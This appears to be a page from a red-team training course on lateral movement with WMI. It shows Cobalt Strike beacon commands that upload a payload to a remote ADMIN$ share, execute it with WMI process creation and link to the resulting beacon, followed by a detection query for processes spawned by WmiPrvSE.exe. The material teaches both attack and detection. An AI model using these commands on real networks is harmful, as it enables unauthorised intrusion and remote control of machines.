Windows Management Instrumentation (WMI)

As you may have noticed, WMI is not part of the jump command but it is part of remote-exec. The remote-exec method uses WMI's "process call create" to execute any command we specify on the target. The most straight forward means of using this is to upload a payload to the target system and use WMI to execute it.

You can upload a file to a remote machine by cd'ing to the desired UNC path and then use the upload command.

beacon> cd \\web.dev.cyberbotic.io\ADMIN$
beacon> upload C:\Payloads\smb_x64.exe
beacon> remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe
Started process 3280 on web.dev.cyberbotic.io

The process is now running on WEB so now we need to connect to it.

beacon> link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
[+] established link to child beacon: 10.10.122.30

As with WinRM, the process will be running in an elevated context of the calling user.

When a binary is executed via WMI in this way, it will be a child of WmiPrvSE.exe. We can therefore look for process create events where WmiPrvSE is the parent.

event.category: process and event.type: start and process.parent.name: WmiPrvSE.exe

PreviousPsExec NextThe Curious Case of CoInitializeSecurity

Last updated 2 years ago